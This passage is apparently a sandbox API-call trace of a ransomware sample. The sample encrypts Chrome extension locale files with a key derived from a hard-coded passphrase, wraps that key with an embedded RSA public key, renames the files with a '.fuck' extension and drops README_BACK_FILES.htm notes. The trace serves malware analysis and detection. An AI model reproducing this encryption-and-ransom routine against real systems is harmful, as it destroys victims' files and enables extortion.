lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0257.081] CloseHandle (hObject=0x5d60) returned 1 [0257.081] CloseHandle (hObject=0x5d5c) returned 1 [0257.082] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json"), bFailIfExists=0) returned 1 [0257.084] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json", dwFileAttributes=0x0) returned 1 [0257.084] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.gsg")) returned 1 [0257.085] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\messages.json.fuck")) returned 1 [0257.086] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.086] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.086] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.086] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.086] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.087] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\readme_back_files.htm")) returned 0xffffffff [0257.087] AreFileApisANSI () returned 1 [0257.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0257.087] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fil\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.087] GetFileType (hFile=0x5d50) returned 0x1 [0257.087] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.088] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.088] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.089] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.089] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.089] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.089] GetLastError () returned 0x0 [0257.089] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json")) returned 0x20 [0257.089] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json", dwFileAttributes=0x80) returned 1 [0257.090] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.091] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.091] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.092] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.093] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.093] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.093] CryptHashData (hHash=0x2e18128, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.093] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.094] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.094] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.094] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e15418) returned 1 [0257.094] CryptImportPublicKeyInfo (in: hCryptProv=0x2e15418, dwCertEncodingType=0x1, pInfo=0x2e2acd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2ad00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2ad08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19c68) returned 1 [0257.094] CryptEncrypt (in: hKey=0x2e19c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.094] CryptEncrypt (in: hKey=0x2e19c68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e154a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e154a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.094] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e154a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e154a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.095] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xbb, lpOverlapped=0x0) returned 1 [0257.096] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xbb, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0257.096] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0257.096] CloseHandle (hObject=0x5d5c) returned 1 [0257.096] CloseHandle (hObject=0x5d60) returned 1 [0257.097] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json"), bFailIfExists=0) returned 1 [0257.099] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json", dwFileAttributes=0x0) returned 1 [0257.100] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.gsg")) returned 1 [0257.101] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\messages.json.fuck")) returned 1 [0257.102] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.102] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.102] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.102] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.102] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.102] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\readme_back_files.htm")) returned 0xffffffff [0257.102] AreFileApisANSI () returned 1 [0257.102] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0257.102] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0257.103] GetFileType (hFile=0x5d50) returned 0x1 [0257.103] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0257.104] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0257.104] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0257.104] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.105] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0257.105] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0257.105] GetLastError () returned 0x0 [0257.105] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json")) returned 0x20 [0257.105] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json", dwFileAttributes=0x80) returned 1 [0257.105] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0257.106] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0257.107] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0257.108] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13988) returned 1 [0257.110] CryptCreateHash (in: hProv=0x2e13988, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0257.110] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0257.110] CryptHashData (hHash=0x2e18128, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0257.110] CryptDeriveKey (in: hProv=0x2e13988, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e19828) returned 1 [0257.110] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0257.110] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0257.110] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e144b0) returned 1 [0257.110] CryptImportPublicKeyInfo (in: hCryptProv=0x2e144b0, dwCertEncodingType=0x1, pInfo=0x2e2aa60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2aa90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2aa98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19928) returned 1 [0257.110] CryptEncrypt (in: hKey=0x2e19928, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0257.110] CryptEncrypt (in: hKey=0x2e19928, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14978*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14978*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0257.111] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e14978*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14978*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0257.112] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xd2, lpOverlapped=0x0) returned 1 [0257.113] CryptEncrypt (in: hKey=0x2e19828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xd2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0257.113] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0257.113] CloseHandle (hObject=0x5d60) returned 1 [0257.113] CloseHandle (hObject=0x5d5c) returned 1 [0257.113] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json"), bFailIfExists=0) returned 1 [0257.115] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json", dwFileAttributes=0x0) returned 1 [0257.116] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json.gsg")) returned 1 [0257.117] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\messages.json.fuck")) returned 1 [0257.118] CryptDestroyHash (hHash=0x2e18128) returned 1 [0257.118] CryptDestroyKey (hKey=0x2e19828) returned 1 [0257.118] CryptReleaseContext (hProv=0x2e13988, dwFlags=0x0) returned 1 [0257.118] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0257.118] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0257.118] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_CA\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\fr_ca\\readme_back_files.htm")) returned 0xffffffff [0257.118] AreFileApisANSI () returned 1 [0257.118] 